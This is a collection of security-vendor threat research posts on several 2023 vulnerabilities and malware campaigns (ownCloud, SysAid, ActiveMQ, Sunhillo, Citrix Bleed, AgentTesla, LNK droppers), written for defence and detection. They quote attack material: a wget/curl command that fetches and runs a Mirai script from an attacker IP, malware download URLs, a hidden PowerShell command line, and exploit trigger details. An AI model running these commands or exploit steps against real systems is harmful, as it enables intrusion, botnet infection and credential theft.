ownCloud GraphAPI Sensitive Data Exposure

Overview

This week, the SonicWall Capture Labs Threat Research Team became aware of a disclosure of sensitive information vulnerability in ownCloud’s GraphAPI application, assessed its impact and developed mitigation measures for the vulnerability. ownCloud, an open-source software for sharing and syncing of files in distributed environments, published an advisory on this sensitive credentials and configuration disclosure vulnerability affecting ownCloud graphapi application versions 0.2.x before 0.2.1 and 0.3.x before 0.3.1.

It can be exploited effortlessly by an unauthenticated remote attacker and carries significant associated critical risk. The vulnerability was also given the highest CVSS score of 10.0. Because of all this, it’s not only capturing the imagination of the cybersecurity community, but it’s also reportedly being exploited in the wild rapidly, making it a strong candidate to join CISA’s Known Exploited Vulnerabilities (KEV) catalog. Hence, it is advisable for ownCloud users to take the mitigation steps provided in the remediation recommendations section.

Update 12/3/23

Due to this vulnerability's severity and easy of exploitation, it is catching attention of cybersecurity community all around the world resulting in many exploring a way to exploit the containerized deployment, previous reported as unexploitable. Researchers at Rapid7 recently reported a technique to overcome the hardening offered by the mod_rewrite segment of the .htaccess file, making the docker mode of installation as vulnerable as the manual one removing any speculation around the severity of this CVE due to limited exploitation possibilities.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-49103.

The overall CVSS score is 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

The vulnerable version of the graphapi application, which comes installed by default if you choose manual or docker-based way of installation, contains the endpoint /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php. That endpoint reveals the critical configuration details as a part of the output of the phpinfo function when accessed by the unauthenticated remote attacker as seen in Figure 1.

Figure 1: Vulnerable endpoint in graphapi

However, the ownCloud docker does not expose the vulnerable endpoint by default due to the additional mod_rewrite block present in the .htaccess file, as illustrated in Figure 2, which triggers a redirection to the login page when someone navigates to the endpoint. On the other hand, by default, the manual installation allows access to the endpoint making the docker mode of installation relatively safer. It’s noteworthy to mention that enabling graphapi is not a prerequisite for the exploit to work.

Figure 2: Additional mod_rewrite block in docker installation

Triggering the vulnerability

Triggering this vulnerability is a breeze, as it only requires hitting the vulnerable endpoint, such as http(s)://example-owncloud[.]com/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php. The attacker only needs to have network access to the vulnerable software.

Exploitation

As demonstrated in Figure 3, successful exploitation of this vulnerability yields the attackers a bunch of juicy information that is stored in the environment variable. This includes the configuration variables of the webserver and may also contain critical information such as mail server credentials, license keys, AWS secrets and other confidential data in case of containerized deployment with vulnerable configuration.

Figure 3: Sample successful exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:
  • IPS:4186 ownCloud GraphAPI Sensitive Data Exposure

Threat Graph

SonicWall sensors have confirmed the spike in the exploitation attempts of this vulnerability and may witness even a surge in upcoming days considering the simplicity of exploitation.

Figure 4: SonicWall signature hits data (Updated 12/3/23)

Remediation Recommendations

ownCloud has released an update to address the issue, and it is strongly recommended to update the graphapi application to the latest version 0.3.1.

Those who are not able to update immediately can also apply the workaround by deleting the root cause file /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php and plan for the update as early as possible.

Relevant Links

/by
,

The Unseen Layers: Exploring the Tactics of Multistage .NET Malware Packers

OVERVIEW

Recently, the SonicWall Capture Labs Threat Research team has identified a new .NET Packer that is currently being widely used by the various stealers such as Lokibot, AgentTesla etc. In the ever-evolving landscape of cybersecurity threats, malicious actors continue to develop sophisticated techniques to compromise systems and exploit vulnerabilities. One such method gaining prominence is the use of multistage .NET malware packers. These devious tools leverage the capabilities of the .NET framework to execute nefarious activities, posing a significant challenge to the cybersecurity of endpoints.
Packers employ the dynamic loading features of .NET, allowing them to download and execute additional modules or payloads off the land without ever touching the secondary storage such as Hard Disks.

To avoid detection, Packer employs evasion techniques such as polymorphic code, obfuscation and encryption. These methods make it difficult for security tools to analyze the malicious code, as it constantly changes its appearance or remains concealed within layers of encryption.

INFECTION CYCLE

Currently, Packer is mainly delivered though phishing emails with a .ZIP file as an attachment. The ZIP attachment contains the PE Packer file.

Figure 1: Infection Chain

TECHNICAL OVERVIEW

Layer 1 of Packer consists of an encrypted layer and the final payload as resource objects. Its execution begins by decrypting the next layer, which is encrypted as a resource of the Packer file named “QuanLyKhSan.GUI.ucDichVu.FR”.

Figure 2: Resource objects stored in layer 1

Figure 3: Decryption code logic for layer 2

Layer 2, which is a DLL file, consists of six exported functions.

Figure 4: Layer 2 classes along with function names

It decrypts the resource “GloriousCore.Properties.Resources.resources.HgoHWhJ”, which is an encrypted fifth layer. Meanwhile, decrypting it causes it to sleep for 15 seconds to evade detection from emulators.

UNVEILING THE FINAL PAYLOAD

1.) Loading of Ⴈ.dll

  • a. Ⴈ.dll is hardcoded in layer 2 as an encrypted byte array.
  • b. The byte array is first transformed using a simple XOR operation.

    Figure 5: XOR operation

  • c. The transformed array is then decompressed using the deflate algorithm and loaded into memory.
  • d. “Ⴈ.dll” has an encrypted resource named "Xeros.Vu.resources. Ⴐ"

2.) Decryption of resource “Xeros.Vu.resources. Ⴐ”

  • a. Layer 2 uses GZipStream to decompress the resource object “Ⴐ”.
  • b. It decrypts the decompressed buffer using an XOR loop.
  • c. The decrypted bytes are a DLL module called “ReactionDiffusion.dll”

    Figure 6: Functions names and XOR keys are stored in an encoded array.

3.) An instance of the ReactionDiffusion.dll module is created.

  • a. ReactionDiffusion.dll decrypts the method name “CausalitySource”.

    Figure 7: Invoking the function "CausalitySource"

  • b. The resource “HgoHWhJ” is a PNG file.

  • c. Packer uses steganography to hide the encrypted layer 5. It executes the function “RestoreOriginalBitmap” to convert the bitmap PNG file into an encrypted byte array.

    Figure 8: Bitmap decoding function from ReactionDiffusion.dll

  • d. An encrypted byte array is decrypted using an XOR loop with three byte keys.

    Figure 9: Decryption function for layer 5

  • e. Final output is the “Tyrone.dll” module.
    4.) Tyrone.dll has an embedded encrypted final payload. In this case, it’s LokiBot.

    Figure 10: Final payload embedded as resource

  • a. Encrypted resource “bcBuFuHG” is decrypted using a simple XOR.

Figure 11: Loading of resource using Resource Manager

Figure 12: Decryption code of the final payload

Lastly, the final payload is injected into a newly created self-process using process hollowing. The final payload in this analyzed Packer is identified as LokiBot, for which we have already written a blog post.

Evidence of the detection by SonicWall’s patented RTDMI™ engine can be seen below in the Capture ATP report for this file:

Figure 13: RTDMI ATP result report conclusion

As .NET malware packers continue to evolve, so must our cybersecurity strategies. Staying informed about the latest threat vectors, adopting advanced security solutions and fostering a proactive cybersecurity posture are essential steps in mitigating the risks posed by these insidious threats. By understanding the intricacies of .NET malware packers, organizations can better protect their systems and data from the ever-present challenges of the digital landscape.

IOCs:

ZIP

  • 070b7112e24ec3a1f2d7cfab98cee1e7f3940a33b199e4ae04b367f9dd20d451

Packer

  • 301e3dd329bd0c0aa4f40a68100350867bd5c956a13f238eedbf68d58c13f2e9
  • 26c034022d9d6924477e3e79cc95590f394e3ccf2ad743163c5a80baacf2a66f
  • 4c9c03f472adf45cc9f246fdf83b28fd1e197bc2ad831dfb75371bb14d5b5585

Lokibot

  • d51297e331fce1ba9f707991445e746a5bce48b1892dfc79d107dcbff9a0b2cf

AgentTesla

  • a02e8a878b70f214f0b9cff49a7d1f594114b80dd1935f9f9e4ea19fb978ba54
/by

SysAid Path Traversal Vulnerability

Overview

SonicWall Capture Labs Threat Research Team became aware of the SysAid path traversal vulnerability, assessed its impact and developed mitigation measures for the vulnerability. On November 8, 2023, SysAid, an IT service management company, disclosed CVE-2023-47426, which is a zero-day path traversal vulnerability carrying a CVSS 9.8 score and affecting on-premise SysAid servers running version < 23.3.36. According to Microsoft’s threat intelligence team and SysAid’s Advisory, it has been exploited in the wild by Lace Tempest (DEV-0950 / TA-505). SonicWall is also currently seeing an increasing number of active exploitation attempts. This is the same threat actor responsible for exploiting the MoveIT File Transfer Tool vulnerability, and the threat actor is associated with a ransomware group known as "CL0P". To mitigate this vulnerability, SysAid has released a patch which is present in version 23.3.36.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-47246.

The overall CVSS score is 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

This path traversal vulnerability allows for threat actors to upload a malicious WAR archive that contains a web shell into the webroot of the SysAid Tomcat web service through a POST request. The attacker can then request the web shell by browsing to the URL where it now resides to gain access to the server.

Triggering the Vulnerability

The vulnerability exists within the SysAid com.ilient.server.UserEntry class in the doPost method. The accountID parameter within this request is suspectable to the path injection since it is directly passed to the File function. By decompiling the Java code, it is possible to see the accountID parameter being saved into a string variable named convertParamater as shown in Figure 1.

Figure 1: doPost Method parsing accoutnId

convertParameter is then stored in a variable which is passed to the file constructor as shown in Figure 2. For readability, the variable has been renamed accountIDParameter.

Figure 2: accountID being used to create a file

The path dictated in the accountID parameter is the location where the data in the body of the POST request will be written. Therefore, to trigger and leverage this vulnerability the attacker needs to send a POST request to the server with the accountID parameter set to where the data in the body of the post request should be written.

Exploitation

Threat actors have been seen successfully exploiting this vulnerability by uploading a WAR archive that contains a web shell into the webroot of the SysAid Tomcat web service. This is accomplished by sending a POST request with a zlib compressed WAR file containing the web shell as the request body and the accountID parameter are injected with the webroot directory. The threat actor then executes this web shell and gains access to the system by navigating to the location injected into the accountID parameter.

Post-Exploitation

After gaining a web shell through the SysAid vulnerability, threat actors were seen leveraging two PowerShell scripts to carry out post exploitation activities. The first is used to launch a malware loader named user.exe. This loads the GraceWire trojan and injects it into Windows processes such as spoolsv.ese. Following the first GraceWire trojan deployment, a second PowerShell script is used to erase evidence associated with the attacker’s actions including cleaning the SysAid on-prem server web logs. Figure 3 below shows the complete attack chain as presented by Zscaler.

Figure 3: Zscaler's suspected exploit chain

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • Attempted Exploitation - IPS:4172 SysAid On-Prem Software Directory Traversal
  • Known Post Exploitation - SPY: 500 Malformed-ps1 ps1.OT_1
  • Known Post Exploitation - SPY: 501 Malformed-ps1 ps1.OT_2

Threat Graph

SonicWall sensors have confirmed active exploitation of these vulnerabilities. The graph in Figure 4 indicates an increasing number of exploitation attempts and we expect exploitations to continue to increase.

Figure 4: SonicWall IPS 4172 Threat Graph

Remediation Recommendations

SysAid has released an update to patch the vulnerability, and it is strongly recommended to update to version 23.3.36 if running a SysAid On-Prem server. The SysAid advisory has also published relevant IOCs and recommendations to identify any system compromise.

Relevant Links

/by
,

Malicious LNK Files Use PowerShell to Deliver Payload

Overview

This week, the Sonicwall Capture Labs Research team has observed an increase in shortcut-based (LNK) malware. These seemingly legitimate LNK files execute PowerShell commands to download malware from a remote server.

Infection Cycle

The malware sample arrives as a file with a .lnk file extension and may use the following names:

  • New product Reebok 2023.lnk
  • Income and benefits - UNIQLO 2023.lnk
  • Requirements and responsibilities - UNIQLO 2023.lnk
  • LAST STUDIO List new product 2023.lnk
  • Last Studio 2023 New Arrivals Campaign Contract.lnk

Executing the .lnk file will run an instance of powershell.exe in the background. PowerShell is built in to Windows and is used as a scripting language that is mostly used to automate admin tasks.

The script is base64 encoded, and when decoded, it shows that its main purpose is to download additional files from a remote server.

Figure 1: Command line

The execution of this script is done without the knowledge of the user and utilizes the following options when running PowerShell.

p o w e r s h e l l . e x e - N o L o g o - N o P r o f i l e - W i n d o w S t y l e h i d d e n - E x e c u t i o n P o l i c y b y p a s s - E n c o d e d C o m m a n d

Meanwhile, an image file is launched and shows a picture of a product. In the screenshot below, an image of what seems like a Reebok-branded outfit is shown when executing the malicious LNK file named “New product Reebok 2023.lnk”.

Figure 2: Reebok outfit

During our analysis, a file named svczHost.exe was downloaded in \Windows\Temp.

Figure 3: Powershell.exe connecting to a remote host to download a file which was saved into %temp% directory as svczHost.exe

This then further downloaded another file named MyRdpService.exe in the same directory.

Figure 4: SvczHost.exe connecting to a remote host and downloading an additional component file that was later written into %temp% directory as myRdpService.exe

As seen in Figures 5 and 6, MyRdpService.exe was constantly seen connecting to a remote command and control server, sending and receiving data.

Figure 5: MyRdpService.exe constantly seen connecting to a remote command and control server, sending and receiving data.

Figure 6: Encrypted packet sent to remote C&C by MyRdpService.exe

Figure 7 shows a log file named logrdp.txt was created which looks like the connection log file. Interestingly the log file, contains some text in Vietnamese.

Figure 7: Log file

We have seen an increasing amount of malicious LNK files used by cybercriminals to deliver payloads. These Windows shortcut files can contain malicious code to abuse legitimate windows system tools, which is a simple way for criminals to evade detection.

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

• GAV: Suspicious#powershell.steal (Trojan)
• GAV: Infostealer.AIL (Trojan)

This threat is also detected by SonicWALL Capture ATP with RTDMI and the Capture Client endpoint solutions.

/by
, ,

AgentTesla Updates Its Infection Chain

The SonicWall Capture Labs Threat Research team has observed AgentTesla infostealer being deployed using image(.jpg) files for last few months. We have observed multiple ZIP files with titles in European languages. Different IPs were seen targeting European nations with AgentTesla stealer and other bots having a wide variety of capabilities.
Infection_Chain

Figure 1: Infection Chain

The initial infection vector is an email with a ZIP file as an attachment. Inside the ZIP file there is a VBS script which is highly obfuscated, needing some heavy de-obfuscation to extract the next stage. The VBS on execution decodes the PowerShell code below:
2_Powershell

Figure 2: PowerShell Script

This PowerShell then downloads an image file Rump_vbs.jpg from the URL: "hxxps://uploaddeimagens[.]com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937".
3_PayloadImageFig_1

Figure 3: Image file embedded with DLL

The PowerShell retrieves a base64 encoded DotNet DLL file from the image file which is embedded between marker tags "BASE64_START" and "BASE64_END". This data is decoded and the DotNet assembly is then loaded into memory.

4_Image_Marker_tags

Figure 4: Image marker tags

After that, the PowerShell loads decoded Fiber.dll, which has the method "VAI" downloading and executing base64 encoded DotNet executable from the URL: "hxxp://79.110.48[.]52/kenjkt.txt".

This is done using: "$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.tkjnek/25.84.011[.]97//:ptth' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))".

The downloaded Fiber.dll is again a heavily obfuscated DotNet assembly and has obfuscated API strings for process injection. Although it has a number of methods, a majority of the methods inside the file have junk code.

5_ProcessInjection_APIs

Figure 5: Obfuscated API names for Process Injection

AgentTesla

For a long time, AgentTesla has been known for its wide variety of stealing and logging capabilities.
The txt file hosted on URL "hxxp://79.110.48[.]52/kenjkt.txt" has base64 encoded data. The decoded DotNet executable is the AgentTesla Payload. First, it enumerates for all of the Chromium-based and Mozilla-based browsers for the sensitive data they store.

ChromiumBased_Browsers

Figure 6: Chromium-based browser's data

Next, it appears that the malware has methods to search for Mozilla login data including the username and passwords in the victim's machine.
7_Mozilla_Data

Figure 7: Mozilla logins

Furthermore, it has functionality to retrieve sensitive credentials stored using Windows Vault GUIDs.
8_WinCredGUIDs

Figure 8: Win Vault GUIDS

AgentTesla does have keyboard hooking, clipboard hooking and logging functionality. Additionally, it has multiple APIs to retrieve keyboard layout and other details as well as information related to Windows and other system information.
1_WindowAPIs_Stealer

Figure 9: System information APIs

The stealer also has a list of sensitive strings or smart words, which contain a number of words leading to the private and sensitive information of an individual. In addition to this, it also checks for different email software, other common software for DB management and FTP connection and a few more well-known software.

10_TelegramBot

Figure 10: SmartWords and Telegram bot

Further, the data is exfiltrated via a telegram bot.

Evidence of detection by SonicWall's RTDMI ™ engine can be seen below in the Capture ATP report for this file:
11_CaptureATP

Figure 11: RTDMI ATP report results

IOCs:
SHA:
9346658f9a881fa08edcf2d4071ae99f71ada25fbdcad0eaf7dfb204c5867a0d
0f6b26bc3cad49b68ab669c5d9def97db345f6c23b8d0ee9cff48262c2db0743
60304a8c52b10cd71bcc76f8a3ad0f0bbfe7395d2c64833400ac06d3c2c81d58
01ec36cf3833166dbad8aeef0c5683905b31956a5d5367ac52fa7aee2be9c64e

URLs:

  • hxxp://79.110.48[.]52/kenjkt.txt
  • hxxps://uploaddeimagens.com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937
/by

Apache ActiveMQ Remote Code Execution (CVE_2023_46604)

Overview

The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability affecting Apache ActiveMQ allowing a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. The vulnerability is categorized as an Unbounded deserialization resulting in ActiveMQ being vulnerable to a remote code execution (RCE) attack. This issue has a CVSS base score of 10.0. CVE-2023-46604 is an unauthenticated deserialization vulnerability in ActiveMQ’s OpenWire transport connector, which is enabled by default and impacts both “Classic” and Artemis clients and brokers. Vulnerable software versions include:

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Organizations still running one of the vulnerable software versions should upgrade to version 5.15.16, 5.16.7, 5.17.6 or 5.18.3, which fixes this issue.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-46604.

The overall CVSS 3.1 score is 10 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H).

Base score is 10 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is low.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Temporal score is 9.4 (E:P/RL:O/RC:C), based on the following metrics:

  • The exploit code maturity level of this vulnerability is proof of concept code.
  • The remediation level of this vulnerability is official fix.
  • The report confidence level of this vulnerability is confirmed.

Technical Overview

Apache ActiveMQ is a widely used open-source message broker written in Java, known for its multi-protocol compatibility. It offers clients the flexibility of choosing from a variety of programming languages and platforms, with support for JavaScript, C, C++, Python, .Net and others.

An attacker connected to OpenWire TCP port 61616 can send an OpenWire packet to unmarshall an ExceptionResponse object instance. By supplying an arbitrary class name as well as an arbitrary string parameter to the BaseDataStreamMarshaller.createThrowable, the attacker will, have access to an arbitrary class to be instantiated with a single command string parameter.

Exploitation

At SonicWall Capture Labs Threat Research, we have recreated the PoC using Metasploit framework as demonstrated in Figure 1.

Before exploitation can occur, the following conditions must be true:

  • The attacker must have network access.
  • The attacker must send a manipulated OpenWire “command” (used to instantiate an arbitrary class on the classpath with a String parameter).
  • A class must be present on the installation in the classpath which can execute arbitrary code simply by instantiating it with a String parameter.

Figure 1 below demonstrates the following steps to exploit this vulnerability:

  • Create and start a vulnerable victim server.
  • Uses a Metasploit module to host the poc.xml file on the attacker’s server.
  • Finally, run the exploit by running Exploit.java.
  • Additionally using Shodan dork we can observe over 6000 vulnerable servers exposed on the internet.

Figure 1: SonicWall Capture Labs Threat Research Exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS:15940 - Apache ActiveMQ OpenWire Protocol Insecure Deserialization

Threat Graphs

SonicWall sensors have confirmed active exploitation of these vulnerabilities. The graphs below indicate an increasing number of exploitation attempts and we expect exploitations to continue to increase.

Figure 2: Threat Graph

Remediation Recommendations

Admins still running one of the vulnerable software versions should upgrade to version 5.15.16, 5.16.7, 5.17.6 or 5.18.3, which fixes this issue.

If that’s not possible, users can mitigate the issue by validating the provided throwable class type via OpenWire marshallers that takes care of OpenWire commands. Further steps to mitigate are dictated on the official link.

Relevant Links

/by
,

Sunhillo SureLine Command Injection Vulnerability

Overview

The SonicWall Capture Labs Threat Research team has analyzed honeypot data which reveals that attackers are actively exploiting an old vulnerability found in Sunhillo SureLine devices. They are specifically taking advantage of a command injection flaw within these devices. The Sunhillo SureLine software is designed to further process surveillance data such as format conversion and data filtering as it is transported in real time.

A critical vulnerability identified as CVE-2021-36380 with a CVSS score of 9.8 was discovered in the Sunhillo SureLine software application. The vulnerability is an unauthenticated operating system (OS) command injection flaw, which could allow an attacker to execute arbitrary commands with root privileges. This could lead to a complete compromise of the target system, enabling the attacker to cause a denial of service or establish persistence on the network. To mitigate this vulnerability, it is strongly recommended that users update Sunhillo SureLine software to at least version 8.7.0.1.1 as SonicWall is seeing an increased number of exploitation in the wild.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-36380
The overall CVSS score is 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

Sunhillo SureLine versions before 8.7.0.1.1 contain an unauthenticated OS command injection vulnerability through the ipAddr or dnsAddr parameters within the networkDiag.cgi script.
This script allows user-provided data to be directly inserted into a shell command via ipAddr or dnsAddr parameters. This makes it possible for an attacker to influence the command's behavior by injecting valid OS command inputs.

Triggering the Vulnerability

To trigger the vulnerability, an attacker sends a specially crafted POST request to the webserver at the URL /cgi/networkDiag.cgi . Within this request, the attacker needs to insert a Linux command as part of the ipAddr or dnsAddr POST parameters. When the webserver processes the POST request, the command the attacker has inserted into the parameter will be executed. The lack of authentication makes it easier for an attacker to exploit this vulnerability.

Exploitation

The following POST request demonstrates how the vulnerability is being exploited in the wild:

The POST request has a malicious payload designed to exploit the vulnerability. It attempts to download a script "l.sh" from the remote server "194.180.48.100" to the "/tmp" directory on the target system using both "wget" and "curl." After downloading the script, it is executed using the "sh" command. Let's breakdown the payload:

  • cd /tmp: Changes the current directory to "/tmp."
  • wget httpx://194.180.48.100/l.sh: Downloads the "l.sh" script from the specified URL.
  • curl -O httpx://194.180.48.100/l.sh: Downloads the "l.sh" script using "curl" with the "-O" option.
  • sh l.sh: Executes the downloaded "l.sh" script using the "sh" command.

Looking up the attacker-controlled server on VirusTotal, we see that the URL (Figure 1) and the script l.sh (Figure 2) are marked as malicious and are used by the Mirai botnet.

Figure 1

Figure 2

Figure 2

Mirai is a malware that created a big botnet of networked devices running Linux making them remotely controlled bots that can be used for large-scale network attacks. It primarily targets online consumer devices such as IP cameras and home routers.

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS 15931: Sunhillo SureLine Command Injection

Threat Graph


Recent indications of increased signature hits point to an ongoing exploitation of this vulnerability in real-world scenarios. It appears that the Mirai botnet has expanded its scope to target vulnerable Sunhillo devices for the distribution of malware.

IOCs

  • SHA256: c8cf29e56760c50fa815a0c1c14c17641f01b9c6a4aed3e0517e2ca722238f63 (l.sh)
  • Known Malicious C2: 194.180.48.100

Remediation Recommendations

To mitigate this vulnerability, it is strongly recommended to update Sunhillo SureLine devices to at least version 8.7.0.1.1. This update will address the security issue and improve the overall system's resilience against such exploits.

Relevant Links

https://nvd.nist.gov/vuln/detail/CVE-2021-36380
https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/

/by
, ,

Citrix Bleed: Leaking Session Tokens Vulnerability

Overview

SonicWall Capture Labs Threat Research Team became aware of the threat Citrix Bleed, assessed its impact and developed mitigation measures for the vulnerability.

Citrix NetScaler is an Application Delivery Controller (ADC) and load balancer designed to enhance the performance and security of web-based applications. Produced by Citrix Systems, NetScaler ensures the swift, reliable and secure delivery of applications to devices everywhere. It combines advanced traffic management, application security, content switching and optimization features in one platform.

Citrix NetScaler, encompassing both ADC and NetScaler Gateway, recently came under scrutiny for a vulnerability identified as CVE-2023-4966. As of October 18th, CISA has reported active exploitation of this vulnerability. This flaw pertains to a sensitive information disclosure that can occur when the system is set up as a Gateway (encompassing VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or an AAA "virtual" server. Notably, the vulnerability corresponds to CWE-119, which is described as "improper restriction of operations within the bounds of a memory buffer". In some configurations, the sensitive information disclosed can include a valid session token.

The affected versions are:
  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
  • NetScaler ADC 13.1-FIPS before 13.1-37.164
  • NetScaler ADC 12.1-FIPS before 12.1-55.300
  • NetScaler ADC 12.1-NDcPP before 12.1-55.300

This vulnerability has been patched by Citrix on October 10th and can be mitigated by upgrading to the latest version of NetScaler.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-4966.

The overall CVSS score is 9.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L/E:X/RL:X/RC:X).

Base score is 9.4 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L), based on the following metrics:
  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is Low.
Temporal score is N/A (E:X/RL:X/RC:X), based on the following metrics:
  • The exploit code maturity level of this vulnerability is Not Defined.
  • The remediation level of this vulnerability is Not Defined.
  • The report confidence level of this vulnerability is Not Defined.

Technical Overview

In an effort to pinpoint the vulnerability, a comparative analysis was conducted between the two specific versions of the software: the older 13.1-48.47 and the newer 13.1-49.15. By meticulously examining the differences and updates between these versions, we were able to identify the exact location of the patch and gain a deeper understanding of the vulnerability's nature. In Figure 1 the differences can be seen by using the tool BinDiff.

Figure 1

The ns_vpn_process_unauthenticated_request function has been meticulously crafted to build and validate the URL /oauth/idp/.well-known/openid-configuration. Within its implementation, there is a significant call to ns_aaa_oauth_send_openid_config, which makes use of the snprintf function as seen in Figure 2.

Figure 2

The primary role of this function is to format and populate the print_temp_rule buffer with a series of characters and values. Delving into its specifics: the destination buffer is print_temp_rule, and it has a Maximum Size of 0x20000, which is equivalent to roughly 128 KB. The format string, a comprehensive JSON object, as seen in Figure 3, details the OpenID Connect configuration.

Figure 3

The snprintf as seen in Figure2, employs multiple %.*s format specifiers which expect a length and a string as paired arguments. These specifiers are used to define various OAuth and OpenID Connect endpoints, with the base URL or domain inferred from the variable host_string. To shed light on the arguments (figure 2): length denotes the length of the host_string and ensures only up to length characters from host_string are printed. The host_string reference is the base URL or domain that fills in the respective URLs in the JSON.

In the aftermath of this operation, not_size_buffer will hold the count of characters intended for print_temp_rule, excluding the null byte, if there were no buffer constraints. This behavior of snprintf is typical: It returns the number of characters it aims to write, irrespective of the size limit that might truncate the actual write-up. Thus, not_size_buffer captures the length of the fully constructed JSON string.

This function's design intricacies go beyond just formatting; there's a security facet to it. Initially, the function would instantly send out the response. But in its patched form, a response is dispatched only if snprintf yields a value less than 0x20000.

There's a vulnerability in how the return value of snprintf is used to determine how many bytes are sent to the client through ns_vpn_send_response. Contrary to what one might expect, snprintf doesn't return the number of bytes it actually writes to the buffer. Instead, it returns the number it would have written if the buffer was large enough. This is where the security risk comes into play. The return value is being incorrectly used as the number of bytes written to the buffer.

Triggering the Vulnerability

  • The target must be running NetScaler Citrix Firmware version prior to 13.1-49.15.
  • The attacker must have network access to the vulnerable software.
  • Sending a GET request to the endpoint: /oauth/idp/.well-known/openid-configuration,
containing Host: a (any 'char' to the power of 24,576).

Exploitation

To exploit this vulnerability, the attacker’s goal is to generate a response that exceeds a buffer size of 0x20000 bytes. If successful, the application would send not only the filled buffer but also the memory following the print_temp_rule buffer, potentially exposing sensitive data or causing other unexpected issues. Proof of concept code has been published and active exploitation of this vulnerability has been reported by CISA on October 18th. Included in the leaked information, depending on the appliance’s configuration, is a 65 byte long hex string which is a valid session cookie. As a resulted an attacker can use this session key to impersonate an active user.

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS:4130 NetScaler ADC/Gateway Information Disclosure

Remediation Recommendations

The risks posed by this vulnerability can be mitigated or eliminated by:
  • Applying the vendor-supplied patch to eliminate this vulnerability.
  • Utilizing up-to-date IPS signatures to filter network traffic.
  • Alternatively, consider taking the server offline.

Relevant Links

  • CVE-2023-4966
  • CNA CVSS Metrics
  • Vendor Advisory
  • Citrix Bleed
  • Public POC

/by
,

Atlassian Confluence Data Center and Server Broken Access Control Vulnerability

Overview

